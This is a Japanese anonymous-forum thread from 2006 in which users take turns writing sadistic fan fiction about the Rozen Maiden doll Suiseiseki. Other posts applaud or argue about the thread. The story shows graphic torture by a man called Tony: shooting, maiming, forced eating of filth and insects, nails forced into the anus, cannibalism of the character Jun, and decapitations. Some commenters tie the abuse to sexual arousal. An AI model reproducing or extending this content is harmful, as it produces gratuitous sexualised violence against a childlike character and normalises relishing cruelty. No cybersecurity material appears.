「ひあっ!!?」
ダンダンダンダンッ!!!!!!!
「きゃああああああっ!!!!!!!!!!!」
翠星石の周囲に砕けたコンクリが舞う。この銃はフルオートで撃ちまくることができるのだ。
俺は新しいマガジンを銃にセットしながら言った。
「そらそら、ジッとしてると足が撃ち抜かれるかもしれねえぞぉ?うひゃひゃひゃはぁっ!♪!!♪」
ダダダダダダッ1!!!ダダッ!!ダダダ!!!!!
「いやっ!ひぃあっ!ああっ!やっ!やめ!やめてっ!いやっはっ!あ!あ!ひっ!ひぃぃっ!!!」
足元のそこかしこに跳弾しまくり噴煙があがるたび翠星石が弾をさけようとして足を上げたり飛びのいたりする仕草が
滑稽なステップを踏んでるように見え、まるで奇妙なダンスを踊るようだ。
だが、ただのダンスと違うのはダンスをやめれば足を撃ち抜かれるかもしれない恐怖と隣り合わせだということだ。
その証拠に翠星石は恐怖におびえゆがんだ顔で必死になっている。
「そらそら踊れ踊れぇ!!!踊らねぇと両足を蜂の巣のジャぁあぁンクにしてくれるぜええええええええ!!!!!!!!!」


289 :名無しかわいいよ名無し:2006/02/19(日) 01:18:40 ID:9QAFWLZK
カチッ
「ちっ弾切れか」
俺は銃のマガジンを交換する。
「!!!!!?ちゃチャンスですぅ!逃げるなら今ですぅ!きゃっ!!?」
だが足元がおぼつかず、床にころがっていた喰いかけのリンゴやメロンに足をとられ転倒する。
    バゴォンッ!!!
と転んだ翠星石の顔の前に転がっていたメロンが異音とともに消し飛んだ。
そう、翠 星 石 の 頭 く ら い の 大 き さ の メ ロ ン が
文字通り跡形も無く。
おそるおそる振り向くとその先には、でかいM29リボルバー(俗にいうマグナム)を握ったトニーがいた。
「銃が一丁だけだとでも思ったのか?ああ?逃げるとてめえのボディに頭よりでっけぇ穴あけるぞ、あ?」

「あ...あ...こ...殺さないで...で...す...こ、殺されたら...ジュ...ジュンに会えなくなっちまうです...」

『おうちに帰して〜』『ママ〜ママ〜』
かつて俺が手にかけてきた女子供もそんな風にわめいていたっけなあ。だがな、んなこと言われてハイそうですか、と言って帰してやるような
そんなマヌケなやつはいねぇwww

だが、俺はここであえて言ってやった。
「いいぜ、もう飽きた」
「?!ど、どういうことですか?」
「飽きたっていってるんだよ、とっととそのドアから出て行きやがれ、それとも何か?
ま〜だ物足りねえとでもいうつもりか?あ?」
「ひっ!」
翠星石は鞄を抱えてドアを飛び出していった。

くっくくくくくくくくくくくくっ!!!♪♪!お楽しみはこれからだぜぇ



290 :名無しかわいいよ名無し:2006/02/19(日) 01:39:40 ID:9QAFWLZK
俺は翠星石が出て行ったドアを開け、部屋の外に出る。
長い長い廊下を進んでいく。

ドンドン...ドンドン...

廊下の先から何かドアを叩くような音がひびいてくる。

ドン...ドンドンドン!
「このドア開かねぇ〜ですぅ!コンチクショウ!!ですぅ!蹴りをいれるです!ボコるです!」

「開くわけねえだろ、そのドア『ドアの形したオブジェ』なんだからよ」

「ひっ!お、オマエは?!」
「なかなか精巧にできてるだろ、その『オブジェ』みんな騙されるんだwwリンダとかいったかなあ?あのメスガキなんて最後までドアだと思ってドンドン叩いて手のひらの骨、自分で砕いちまったんだぜぇwww」
「うううっどこまでも卑劣な奴です!今までどのくらいの人たちにそんな残酷なことをしてきたですか?!」

「へっ、おめぇはいままで喰ってきたパンの枚数を覚えているとでもいうのかよ?ひゃはははあはっwwwww」
「く、狂ってるです...オマエは狂ってるですぅ〜」








疲れた誰か続き


291 :名無しかわいいよ名無し:2006/02/19(日) 01:46:08 ID:/wDxb6E+
>>288-290
激しくGJ!

>>289
>.こ...殺さないで...で...す...こ、殺されたら...ジュ...ジュンに会えなくなっちまうです..

'`ァ'`ァ'`ァ(;´Д`)'`ァ'`ァ'`ァ


292 :名無しかわいいよ名無し:2006/02/19(日) 02:09:15 ID:de1i6ega
「ああ?俺は元から狂ってるぜい!」
俺はどこからともなく取り出したカマで翠星石のダラリとした指を切り落とした。
「きゃあ!指が・・・感覚がないですぅ!」
「痛いか?もっと苦しめ!泣け!叫べ!」
腹を思いっきり蹴りまくる。
「いた!や、やめ・・・やめて!お腹が・・・」
「聞こえねえなあ!もっと大きい声で!」
「お、お腹が痛いですぅ!」
「お〜う、もっと痛めつけてくれってかあ?」
そこで蹴るのを一旦止めた。
翠星石の怯えた表情が俺の瞳に写る。
「いいぜ、もっともっと苦しませてやるぜ。俺、真性サドだからよぉ」
まずはスコップで顔面タコ殴り!
「オラ!オラ!その汚ねえツラぶち壊してやる!」
「お次はこれだ!」
腹に主っきりスコップを突き刺した。
ミシミシと嫌な音が聞こえる。
「あ、あ・・・あああ・・・」
喋る気力も無いのか気を失っているのか抵抗する力はないみたいだ。
「邪魔なんだよボケが!寝るならあっちで寝ろ!」
俺は翠星石を便所まで蹴り飛ばした。そして便器に顔を突っ込ませる。
「おら!起きろ!寝るんじゃねえ!」
すると翠星石の体がバタバタと動き始めた
「ガボ、ゴボ、ゴボボボ!(汚いですぅ!)」
「どうだ?いい味だろ?流してないからクソやら尿やらウジ虫やらが大量だぜ!ひひゃひゃひゃひゃ!」
そして目を覚ました翠星石の顔を便器から出すと、今度はゴキブリホ○ホ○を目の前に置いた。
「これを・・・どうするつもりですぅ!」
「食うんだよ!もう12時だからな!昼飯だ、たっぷり食え!」
「いや!近づけないで!こんなの食べられないですぅ!やめてですぅ!あっ!」
嫌がる翠星石など無視してゴキブリホ○ホ○に翠星石の顔を押し付けた。
「うええええ!気持ち悪いですぅ!」
「しっかり食えよな!これからが本番なんだから!蛆虫スープも飲めよ!」
今度は便器に顔を押し込んだ。
「しっかり飲めよ!生蛆虫のスープなんて滅多に飲めないぜ!」
「はあはあ、もうイヤ・・・」

あと書いて

293 :名無しかわいいよ名無し:2006/02/19(日) 03:45:14 ID:TJWuBOkN
リレースレになったなw

294 :名無しかわいいよ名無し:2006/02/20(月) 10:17:53 ID:7OWy/ufQ
便器の前で汚物まみれで気を失っていた翠星石は目を覚ました。
「ううう、うえっ、おげええ」
鼻の穴からは蛆が口の端からはゴキブリの足がはみ出ていた。それをいったんは吐き出す翠星石。

「目が覚めたか?もう夜だぜぇwww」
「くひっ!こ、今度は何をするつもりですか...」
「何って晩飯がまだだったからよぉ、晩飯持ってきてやったぜェ」
「?!...そ、それは?」
今度はどんなおぞましいものを食べさせられるのか身構えていた翠星石は唖然とした。
トニーの手にはジュージューと音をたてるアツアツのハンバーグステーキの皿があったからだ。
「ほれ、食え」
「い、いやですぅ!どうせ毒か何か入ってるに決まってるですぅ!」
「あ?毒だあ?こんなに旨いのによぉ」
警戒する翠星石をあざ笑うようにハンバーグステーキを一口ほおばりクチャクチャと食べるトニー。
「あ〜旨ぇ!新鮮な肉を使っただけのことはあるぜぇwww」
グウウウウッ!
突然鳴ったのは翠星石の腹の虫だった。
「あ?何か聞こえたぞ?...そうかそうか体は正直なようだなぁwww」
「あううう...屈辱ですぅ」
「食うのか食わんのかハッキリしやがれ!食わねぇならこいつは便器に流すぞ!?」
「うぅぅうっ!よ、よこしやがれですぅ!!」
翠星石は悔しかった、この程度の誘惑に落ちた自分が。
だが、便器の汚物や蛆、ゴキブリの踊り食いの洗礼を受けた翠星石には抗えなかったのだ。

「へっへっへ...旨いか?あ、こら、え?クソ人形?」
旨い...確かに旨い。昼に食べた蛆やゴキブリ、糞尿よりも!涙が出るほど旨かった翠星石はハンバーグをむさぼるように食べた!
翠星石がハンバーグを半分ほどたいらげたときトニーが話しかけてきた。

オマエ、JUN SAKURADA って奴を知ってるか??

「?!なぜお前なんかがジュンを知ってるですか?!」


295 :名無しかわいいよ名無し:2006/02/20(月) 11:04:40 ID:7OWy/ufQ
「あ〜それそれ、そのジュンっていう名前のジャップのメガネ小僧な、さっき俺んちにきたんだぜぇwww」
「な、何をデタラメぬかしやがるですか!ジュンがこんな薄汚ねえところにくるわけねぇですぅ!」
「それが、来たんだよ俺んちの呼び鈴押してよぉ『翠星石っていう可愛いお人形を知りませんか?』だってよwww
 手違いで俺んちに送られてしまったのをネットでつきとめたとか言ってたぜぇ」

「ジュ、ジュンがここに...」
期待で目を輝かせる翠星石
(な、なんとかジュンに会って即再契約をするですぅ!そうすればこんなチンピラ野郎なんかギッタギタにしてやるですぅ!)
「ジュ、ジュンは?ジュンに会わせてほしいですぅ!」
「へ、あわてんじゃねぇ安心しな、オマエのボーイフレンドはまだウチにいるぜぇwww」
「ぼぼぼぼボーイフレンドじゃないです!あああああああんなチビ!」
「ほう、そうかい?オメェの鞄の中にあった写真に『ジュン、ラブラブちゅっちゅ♪食べちゃいたいくらいですぅ!』ってあったぞ、げへへへwww」
「う...あがががっ、お、乙女の秘密を...」
「ま、ジュンとやらに会いたくねぇって言うんなら別にとめやしねぇがなwww」
トニーの言葉を聞くまでもなく便所を飛び出し、翠星石はジュンの姿を探し求めた。
「うううう!ジュン!ジュン!どこにいるですか?翠星石ですぅっ!!いるならいる、いないならいないとサッサと返事しろですぅ!」
だが、リビング、玄関(内側からカギがかかっていて開けられない)寝室、ゲストルーム、バスルーム、
のどこを探してもジュンの姿はない。
「あのギョロ目、とんだ嘘つき野郎ですぅ!ジュンなんてどこにもいねぇ〜じゃないですかぁ!!」
と独り言をいう翠星石の背後に立ったトニーが言う。
「オマエのボーイフレンドならキッチンにいるぜぇwwwきひひひっwww」
「キッチン...?どうしてジュンが台所にいるですか?」
「行きゃ〜わかるぜ?ま、行きたくないなら無理に行かなくてもいいがなwww」
「ちっ!そこをどきやがれですぅ!」
翠星石はトニーの脇を通り抜け、キッチンに向かう。そんな翠星石を卑猥な笑みで見送るトニー。

「ここがキッチンですか?ジュンはどこにいるです?」
翠星石はあたりを見回した。だが、あちこちが汚物まみれで足元にビール瓶だのゴミだのが散乱し
その間をゴキブリやドブネズミが駆け回ってるキッチンにはジュンの姿はなかった。

296 :名無しかわいいよ名無し:2006/02/20(月) 11:44:36 ID:7OWy/ufQ
「ジュン!どこです?どこにいやがるですか!とっととでてくるですぅ!」
だがジュンが出てくる様子はない。と背後に誰かの気配を感じた。
「ジュン?!」
だが...
「ざ〜んね〜んでしたぁ、俺だ!トニーだ!!眼鏡のジャップ小僧じゃないぜwwあとな、『トニー、力が出ないよう』
 『ようし、こんな時はケ〇ッグコーンフロストだ!』のトニー・ザ・タイガーとは無関係だぜぇwwそこんとこヨロシクなベイベ〜〜ひゃははははっwww」

自分でボケて自分でツッこむトニーは無視して翠星石はトニーに問い詰める。
「コンチクショウですぅ!嘘をつきやがったなですぅ!この翠星石をたばかりやがったなですぅ!」
「おいおいおい、嘘なんてついてねえぜ?眼鏡ジャップのチビ小僧ならその中にさっきからお待ちかねだぜwwきひひひwww」

トニーの指差す方向を見る翠星石。その視線の先にはテーブルの上におかれた寸胴のシチュー鍋がある。
「ふ、ふさけるなです!いくらジュンがチビだからって、あんな小汚ねぇ、ちっこい鍋の中に隠れられるわけがねぇです!」
「嘘じゃねぇよ、嘘だと思うなら中を見てみるといいぜぇwww」
トニーの言葉に鍋に近づく翠星石、何かの罠かと思い一瞬、鍋のフタを取るのに躊躇したが
意を決して翠星石は鍋のフタを取り払った。
寸胴の鍋の中にはもちろんジュンの姿など無く、何かのひき肉かモツ肉のようなものがフチいっぱいまで入っていた。
異様な臭いがする。翠星石は顔をしかめた。
「おいおいおい、そんなに嫌な顔するこたぁねーだろう?オマエがさっき食ったハンバーグはこいつからつくったんだぜぇ?」
見るとトニーは翠星石が半分残したハンバーグの皿をわざわざキッチンにまで持ってきていた。
ふと、翠星石の目が食べかけのハンバーグにとまる。ハンバーグの断面に妙な物が見えたのだ。
「ちょ、お前!そのハンバーグをよこしやがれですぅ!」
「いいぜぇwwおかわり自由コーヒーも飲み放題だぜぇwww」
翠星石はトニーの手からハンバーグをひったくるように取り戻した。
そしてハンバーグの切り口の断面からはみ出ている何かを引っ張り出す。

ずるぅ

「こ、これは...?」
ハンバーグの中から出てきた異物は何かひしゃげたプラスチックのようなものだった。
熱で溶けてひしゃげてはいるが元は−□−□−な形をしていたような...
「ま、まさか...で...す」
今度は寸胴鍋にかけよった翠星石は鍋をオタマでかきまぜてみた。
異臭を放つひき肉だかモツ肉をかき回していくうちに何かがオタマにからみついてきた。
オタマには無数の何か『細〜〜い糸のようなモノ』がからみついている。
「ま#$$%&~|||\ままま\\\"#?@@まさか!!!こ、この!#$%肉は#&ジ...
イやああああ嗚呼ああ嗚呼嗚呼嗚呼嗚呼ああああああああああああああああああっ!!!!????!!!?!???!??!?っっ〜〜〜〜〜!!!!!!!!」

翠星石の絶叫にトニーの下卑た笑いがかぶる
「ぎゃははあっははっはははwwwwそんなにわめくほど嬉しいか?嬉しいよなぁwww
 眼鏡小僧の写真の裏に『ラブラブちゅっちゅ♪食べちゃいたいくらいですぅ!』って書いてあったからよぉ、
 わざわざオマエのリクエストに答えてやったんだぜぇwwwぎゃはははは!!!」

「すすすす翠せせ星ぃ石きききははジュジュジュジュンをジュンを...うおっぷ...
うげええええええええええええええええええええええええええええええええええ〜〜っ〜〜〜っ!!!!!!!!!」

「おいおいおい!何吐いていやがるんだよ!せっかくラブラブな彼氏とマジで身も心も一つになれたってゆ〜のによぉ!!
 自分の彼氏吐いてんじゃねぇ〜よ、ききゃははあっははははHHっはっ!www!♪♪」





誰か続き書いて


297 :名無しかわいいよ名無し:2006/02/20(月) 17:26:29 ID:4yZf/4b2
カニバリズム キタ

298 :名無しかわいいよ名無し257:2006/02/20(月) 19:12:40 ID:mEj974Os
GJ!!
お茶でもどうぞ。つ旦

299 :名無しかわいいよ名無し:2006/02/20(月) 19:15:57 ID:KhjNa4U1
流れがデュードっぽくなってきたな

300 :名無しかわいいよ名無し:2006/02/20(月) 19:18:53 ID:4EnnKEam
すばらしすぎる

301 :名無しかわいいよ名無し:2006/02/20(月) 22:16:30 ID:DApvtg/q
>>296
こういう王道的なのもいいなwオチがわかってる分いまかいまかと待ち構えてしまったwww








で、翠星石って何色の娘?

302 :名無しかわいいよ名無し:2006/02/20(月) 22:47:35 ID:KhjNa4U1
それの前の人の書いた蛆虫スープは想像したら吐き気が催してきたよ・・・

303 :名無しかわいいよ名無し:2006/02/21(火) 02:12:59 ID:ynM3CGXx
>>296
またバラバラにしてしまいそうだから漏れは書かずにみている
おもしろいから頑張って!

>>301
緑色

リレーは任意参加みたいだからまたなにか思いついたら、リレーではないものを書き込みますね

304 :名無しかわいいよ名無し:2006/02/21(火) 11:05:16 ID:1JiFYPXw
方針演技思い出した

305 :名無しかわいいよ名無し:2006/02/21(火) 13:12:54 ID:LYM4re+c
ダッキがハンバーグを作ったやつか

306 :名無しかわいいよ名無し:2006/02/21(火) 19:12:01 ID:jo9q4UrE
ダッキ?

307 :名無しかわいいよ名無し:2006/02/21(火) 21:22:01 ID:LKusqP42
wakuwaku

308 :名無しかわいいよ名無し:2006/02/21(火) 23:33:53 ID:sv4Qz+z7
続き
そして次の日の朝・・・
「うう・・・寂しいですよぅ蒼星石・・・」
朝から寂しげに泣く翠星石。無理もない。
昨日はあんな酷い目にあったのだから。
体中をボロボロにされた上、自分の愛する人間を食ってしまったのだから。
しかし、悲しいかな、壊れた部分はすべて人工精霊が直してしまうのだ。
便利といえば便利だが、この時ばかりは人工精霊を恨む翠星石であった。
 そこへトニーはやってきた。腹に一発蹴りを食らわせる。
「おい!朝っぱらか五月蝿えんだよ!人形の癖に涙なんて流してんじゃねえ!」
そう言ってさらに蹴りを食らわせるトニー。
「うう、蒼星石・・・」
『蒼星石』、その名を聞いてトニーは思いついた。
「ちょっと待ってろ」
トニーは水をたっぷり入れた壷に翠星石を放り投げ、蓋の上に漬物石を置くと、自室のパソコンを起動した。
「なるほど・・・蒼星石とはこいつのことか・・・」
・・・昼
壷を開けて水浸しの翠星石を取り出した。
「散歩に行くぞ。だがその格好ではまずい。とりあえず全部脱げ」
「え?全部ですか?・・・恥ずかしいですぅ・・・」
「いいからとっとと脱げ!人形が生意気抜かすとぶち壊すぞ!」
「っひ!はいですぅ・・・」
恐る恐る服を脱ぬ翠星石。
「下着もだ。そんな格好で出歩く馬鹿がどこにいる」
「で、でも・・・」
「でももクソもねえんだよ!言う事聞け!」
「わ、わかったです!脱いでやるです!」
もう翠星石の頭の中は真っ白だった。こんなクズみたいな人間に裸を見せなければならないなんて・・・。
下着を脱ぎ、裸の翠星石は顔を赤面しながら後ろを向いて蹲っていた。
そんな翠星石の首にガチャリと冷たい金属の音がした。
「な、なんですかこれは!」
「鎖だよ。お前が逃げないようにな。その格好で散歩に行くんだ。しっかり歩けよ犬」

309 :名無しかわいいよ名無し:2006/02/21(火) 23:58:15 ID:sv4Qz+z7
玄関から出ると、そこは荒廃したゴーストタウンのようなところだった。
古ぼけたマンションや廃工場。そんなところに住むのがトニーであった。
「いいか、四つん這いになって歩け、少しでも2足歩行したり、休もうとすればそのケツに釘を打ち込むからな」
そう言ってトニーは内ポケットに大量に入った釘を見せつけた。
「うう、屈辱ですぅ・・・」
「ああ?犬が口答えするんじゃねえ!」
トニーは鎖を思いっきり引っ張った。翠星石は宙に浮き、次の瞬間ベランダの手すりに叩きつけられた。
「う・・っぐ・・・」
脊髄の当たりを思いっきり打ちつけた翠星石は声も出なかった。
 ゴーストタウンを散歩していると彼方此方から腐食した臭いが漂ってくる。腐った動物の臭いだ。
「う・・・酷い臭いですぅ・・・」
「いいだろう?実に綺麗な空気だ。これこそパラダイスだぜ!そして翠星石!お前もいずれこうなるんだよ」
すると翠星石はトニーの脛を後ろ足で蹴り飛ばした。
「ちょ、調子に乗るのもいい加減にしやがれです!お前なんていずれ・・・っきゃ!」
「調子こいてんのはてめえだろうが!!!立場ってものを考えやがれ!」
トニーは翠星石を持ち上げると、尻の穴に釘を5本詰めた。
「や、やめやがれです!さ、裂けちゃうですぅ!」
ズブズブと釘を入れていく。やがてすべて飲み込むように体の中に入っていった。
「あ・・・ああ・・・」
ぶるぶると体を強張らせる翠星石。
ニタニタと笑いながらギョロっとした目を光らせるトニー。
「おいおい、なんだかんだいって感じてるんじゃねえのか?人形のくせに!」
「う・・・翠星石は感じてなんていないのですぅ!」
顔を真っ赤にして否定する翠星石。
「いいからさっさと歩け!」
 どのくらい歩いただろうか、やがて見慣れた光景が目に入ってきた。
そう、ここはジュンと暮らしていた町である。
上手く逃げ出せばジュンの家にたどり着けるかもしれない。ジュンはいないけど真紅なら・・・とわずかに期待を寄せる翠星石であった。
「この町、知ってるだろ?先に言っておくが俺の目的地はあの丘の上にある薔薇屋敷だ。お前の愛しい妹蒼星石のいる所だ」
「な、なんでそれを知ってるですか!」
「おいおい、俺の情報網を舐めちゃ困るぜ。人形にはわからないような高度な技術があるんだよ」
蒼星石の所へ行って何をするのだろう。
翠星石の不安は募るばかりであった。

310 :名無しかわいいよ名無し:2006/02/22(水) 00:08:44 ID:PHcaVgc6
。゚+.(・∀・)゚+.゚イイ!!
すばらしすぎる!!        つ旦

311 :名無しかわいいよ名無し:2006/02/22(水) 00:28:19 ID:2GCOnY5K
玄関の前までやって来た二人(トニー的には1人と1匹)
「いいか、お前はここで待ってろ」
そういってトニーは近くの手すりに鎖を縛りつけた。
中に入っていくトニー。しばらくして騒がしい音が聞こえてきた。
「な、何の音ですかぁ?」
こっそりドアに耳を近づける翠星石。するとトニーの声が聞こえてきた。
『おい!クソジジイ!さっさと蒼星石を出しやがれ!』
『っく、蒼星石!逃げるんだ!ぎゃあああ!』
この声には聞き覚えがある。
「おじじ!」
翠星石は必死で鎖を解こうとした。だがきつく縛ってあるためなかなか解けない。
すると屋敷の中ではさらに激しい音が聞こえてきた。
『よくもマスターを!許さない!』
蒼星石の声である。彼女に会える!そう思った翠星石はさらに必死になって鎖を解こうとした。
『ああ?てめえごときのボンクラ鋏じゃ俺を殺せねえよ!このトニー様はな!』
そしてその瞬間玄関のドアが吹き飛んだ。
衝撃で鎖が繋がれていた柱も崩れ、翠星石は自由の身となった。
「今行くですよ!蒼星石!」
『来なくても目の前にいるぜ!』
煙の中から人影が見える。トニーだ。顔には血がこべりついており、右手にはぐったりした蒼星石を持っていた。
そして後ろには首の無い体が車椅子に座っていた。そう、蒼星石のマスター、結菱一葉である。
「きゃあああああああ!!!!おじじ!!!」
「おいおい、妹よりクソジジイの心配か?」
「う、蒼星石を返してです!」
「やなこった。蒼星石最後に言いたいことはあるか?」
「ごめん、翠星石・・・君を敵に回しちゃって・・・でもマスターは守れなかった・・・」
「まだ翠星石がいるです!今度は私が守ってやるです!」
「・・・ありがとう翠星石・・・また君と会え」
ゴトンと蒼星石の首が落ちた。
「きゃああああああああああああああああああああああ!!!!!そ、そ、蒼星石いいいいいいいい!!!!!」
「っはっはっはっは!!!お涙頂戴の姉妹の感動物語!ここに終焉!ってか。傑作だぜ!」

俺はここまでです。

312 :名無しかわいいよ名無し:2006/02/22(水) 02:34:56 ID:VSbMNFso
翠星石が嫌いなのか、単に何らかのキャラを虐待したいだけなのかようわからんスレだ
ここにいる人と翠萌えな人はどっちが多いだろう



313 :名無しかわいいよ名無し:2006/02/22(水) 02:40:24 ID:VSbMNFso


314 :名無しかわいいよ名無し:2006/02/22(水) 02:43:35 ID:VSbMNFso
↑312・多いだろうということ・のミス 313もミス
どっかのスレで精神鑑定が必要とのことです
反論があるなら書きこして


315 :名無しかわいいよ名無し:2006/02/22(水) 02:47:11 ID:v87j9hjz
数ヵ月後に「犯人はネットでこんなものを…」
ってニュースで流れそうなスレだな。

実際まざってるんじゃねえの、そういうやつ

316 :名無しかわいいよ名無し:2006/02/22(水) 02:56:58 ID:wgTKBhRu
>>217-220
おい、帰るぞ
こっちはこっちの楽しみ方があるんだろうよ
そこはしっかり理解してあげろ
紳士らしくも無い書き込みすんな

317 :名無しかわいいよ名無し:2006/02/22(水) 03:05:54 ID:gyyXcQxy
うひぷぷりゅっひへんへへ、ふひゅっふひゅっ

318 :名無しかわいいよ名無し:2006/02/22(水) 03:22:53 ID:VSbMNFso
アニメキャラをいじめてる変態共だとのことです 
315>>要するに障害者が集うスレってこと?
もしそうなら障害者の集うスレって名前に変換すべき 
316>>失礼しました
たぶんこれが最後になると思います
<保証はないけど>


319 :名無しかわいいよ名無し:2006/02/22(水) 03:44:12 ID:R7P/hgeF
<ローゼン本スレから飛んで来た人達へ>
本スレがあなたの住んでいる国と考えれば、ここは外国です(あなたの立場からすれば)。
その国のやり方に他国が口出しするなど、図々しいとは思いませんか?
あなた方の価値観・趣味を押し付けないでください。余計なお世話です。

320 :名無しかわいいよ名無し:2006/02/22(水) 03:53:55 ID:Sm6TKs8W
スレタイ見て見たい人だけ見て見たくない人は見なければいいだけ。結局はみんな翠が好きで好きでしかたないだけなんだから‥

321 :名無しかわいいよ名無し:2006/02/22(水) 04:01:23 ID:VSbMNFso
319、320>>自分の考えではないけども、いわれてみれば確かに。 
他スレの暴言の表記を謝罪します。
世の中にはいろんな人がいると実感しました。


322 :名無しかわいいよ名無し:2006/02/22(水) 04:13:53 ID:0Af0Bipr
じじい死んでるしwwwwwwwww

323 :名無しかわいいよ名無し:2006/02/22(水) 04:17:05 ID:Sm6TKs8W
君も翠が好きならいつか分かる時が来るよ。本当は幸せになって欲しいと願う一方で、その時が永遠にこないと言うえもいえぬ快感がね‥

324 :名無しかわいいよ名無し:2006/02/22(水) 04:17:33 ID:6FV0T1yf
アンカーぐらいちゃんと、つけろ新参。










蒼星石に、やるのを見ると心がいたむ

325 :名無しかわいいよ名無し:2006/02/22(水) 04:24:05 ID:0Af0Bipr
ID:VSbMNFsoは釣りだろ
マジならこんな痛い奴は久しぶり

326 :名無しかわいいよ名無し:2006/02/22(水) 04:48:06 ID:VSbMNFso
312,313,314,316、321は俺が寝てる間に今日泊まっていってる友人が勝手にパソいじって書きこしたもん
勘違いは決してしないで欲しい。
<友人は一発殴っといたから。>

327 :名無しかわいいよ名無し:2006/02/22(水) 10:13:18 ID:cZTsqiQX
ノシ

328 :名無しかわいいよ名無し:2006/02/22(水) 11:21:51 ID:/tsqjm01
(´_ゝ`)

329 :名無しかわいいよ名無し:2006/02/22(水) 12:39:16 ID:4KckbDVu
このスレ外に出したのどこのバカだ。18禁みてーなスレってこと忘れんなや。
北チョンじゃねえんだから他に迷惑かけて「ほっとけ」じゃすまねえんだよ。

俺ちゃガラパゴスだ。
ひっそり生きてこうぜw

330 :名無しかわいいよ名無し:2006/02/22(水) 15:34:19 ID:VSbMNFso
俺としては良くも悪くも無いスレだ。他人が書く夢小説だから干渉する気もないし。
最初見たときはカワイソ過ぎてで5秒くらいフリーズ状態になったけど。
<自分は翠萌えだから。>

331 :名無しかわいいよ名無し:2006/02/22(水) 15:59:00 ID:LXfEHxrM
>>330
なんだかスゲー痛々しいな


332 :名無しかわいいよ名無し:2006/02/22(水) 16:23:40 ID:VSbMNFso
↑言うな。

333 :名無しかわいいよ名無し:2006/02/22(水) 16:33:02 ID:2GCOnY5K
それはともかく続き書いてくださいよ。

334 :名無しかわいいよ名無し:2006/02/22(水) 17:50:41 ID:0+mr24XQ
ぐったりしてる蒼の子いいね〜
翠に止めを刺させてたらもっとよかったかも。
気が遠くなるような感覚に襲われてる蒼星石に無理やりやらされてる翠星石がね。
最後に翠・・・星・・石・・・? やめ・・・て。お願い・・・・だから。
とか言ってたらマジ萌えるんだけど。
って俺犯罪予備軍かもwww

335 :名無しかわいいよ名無し:2006/02/22(水) 18:31:57 ID:LXfEHxrM
わくわく( ゜∀゜ )


336 :名無しかわいいよ名無し:2006/02/22(水) 20:45:42 ID:LCrHG891
猟奇的とか変態とか言ってる人。
『鞄の中に少女人形を入れて持ち歩いた哲学者』『物を食べたり飲んだりする人形』とかの元ネタと
アニメ・トロイメントOP曲の2番の『ひび割れたガラスケースに飾られた純潔は』って歌詞の元ネタは

『サド公爵』とかサド物の小説とかでその筋では有名なヤバ系の純文学作家澁澤龍彦の「人形愛について」って本や
『純粋な乙女を硝子ケースに永遠に保存し鑑賞し続けることは人類の夢である』って論文が元ネタなんだぞ?

つまりローゼンメイデンにサド(虐待・虐殺)は必然なのだww

337 :名無しかわいいよ名無し:2006/02/22(水) 21:06:55 ID:UEpt1bsb
>>336
煽るな。

空気嫁

338 : ◆pmFmA/Iv.k :2006/02/22(水) 21:36:42 ID:KqLZZU8o
いち翠星石萌えの俺がひとつ言いたい事がある。
翠星石を虐待・虐殺するヤツと
翠星石を虐待・虐殺したレスを見てGJとかイイとか言ってるヤツは全員氏ね。
中にはこれらを愛ある虐待と言うヤツもいるだろうがそれはただの虐待であって自分には愛は感じられない。
もうこんな真似は止めてくれ。頼む。

339 :名無しかわいいよ名無し:2006/02/22(水) 21:44:40 ID:cFp4ri+m
何故?

340 :名無しかわいいよ名無し:2006/02/22(水) 21:48:36 ID:0+mr24XQ
>338
やらな来るな。
来なきゃ不快に感じない。
必要以上にここの人に干渉してくれるな。
それぞれの世界ってもんがある。
自分の意見等の押し付けはよくないぞ。

341 :名無しかわいいよ名無し:2006/02/22(水) 21:57:02 ID:CYY/nl9v
>>338
俺たちを虐待するようなこと言うな

342 :名無しかわいいよ名無し:2006/02/22(水) 21:59:09 ID:0Af0Bipr
おめーらスルーするですぅ!

343 :名無しかわいいよ名無し:2006/02/22(水) 22:04:08 ID:Sm6TKs8W
>>342
同意。

344 :名無しかわいいよ名無し:2006/02/22(水) 22:53:15 ID:VSbMNFso
>>338落ち着け。
ここにいる翠はあくまでこのスレにいるやつ等の中にいる翠であって、自分たちの翠は自分の心の中にいるもんだと考えるべし
俺も翠激萌えの一人だが、こう考えればきれいに流れた。
最初は衝撃だけど、自分の中の翠をしっかりと保っていれば、不快感は少しずつ消えていく。
ここにいるやつ等は少し猟奇的に感じるがこれで満足しているんだから放置すべし。

345 :名無しかわいいよ名無し:2006/02/22(水) 22:55:08 ID:VSbMNFso
↑放置すべしではなく置いておくべき
<まちがえちまった>

346 :名無しかわいいよ名無し:2006/02/22(水) 23:31:35 ID:/vBhunbm
猟奇萌え、というジャンルがあるだろう

347 :名無しかわいいよ名無し:2006/02/22(水) 23:58:16 ID:VSbMNFso
>>346
知らなかった。
恐るべし萌えのジャンルの量。

348 :名無しかわいいよ名無し:2006/02/23(木) 00:28:51 ID:M4UxESyt
つーか釣だろ。
いいかげん必死になって反応すんじゃねえ。



349 :名無しかわいいよ名無し:2006/02/23(木) 00:30:14 ID:XlUe0DEw
>>311
マジ傑作

350 :名無しかわいいよ名無し:2006/02/23(木) 00:35:55 ID:Lb4N5PDl
<347>また勝手にパソいじられてる<泣泣泣>
アンのぼけがああああああああ


351 :名無しかわいいよ名無し:2006/02/23(木) 01:52:29 ID:oId3k7zp
はいはい
宿題終わらせてから寝ような

352 :名無しかわいいよ名無し:2006/02/23(木) 02:08:24 ID:Lb4N5PDl
とっくに終わってる。
知りもしないくせに何いってんの?
覗き?


353 :名無しかわいいよ名無し:2006/02/23(木) 02:36:47 ID:+f6Kv6JM
翠星石を虐待することで性的興奮を得られるのだ

354 :名無しかわいいよ名無し:2006/02/23(木) 03:21:37 ID:NtdJPPsr
おまいらがなに言おうが、漏れは翠星石を虐待し続けるからな

355 :名無しかわいいよ名無し:2006/02/23(木) 03:30:14 ID:XlUe0DEw
続きが早く読みてえ

356 :名無しかわいいよ名無し:2006/02/23(木) 10:56:14 ID:3lJ/XGs2
続きまだー

357 :名無しかわいいよ名無し:2006/02/23(木) 11:38:30 ID:7pr1PsBd
「蒼星石蒼星石蒼星石ぃぃぃぃぃぃぃぃっおじじぃぃぃぃぃぃっいやいやいやいや嫌ぁ〜〜〜ですぅぅぅ〜〜〜〜!!!!!!」

蒼星石と結菱一葉の首をかかえたまま翠星石は泣き叫んだ。何より最愛の妹を失ったことが大きかった。

「蒼星石ぃ蒼星石ぃ...ああああああああああああああああああああああっ...」

「いつまでも、ぴいぴい泣いてんじゃねぇ!このクソ人形!!」
そういってトニーは翠星石に延髄斬りをくらわせた。
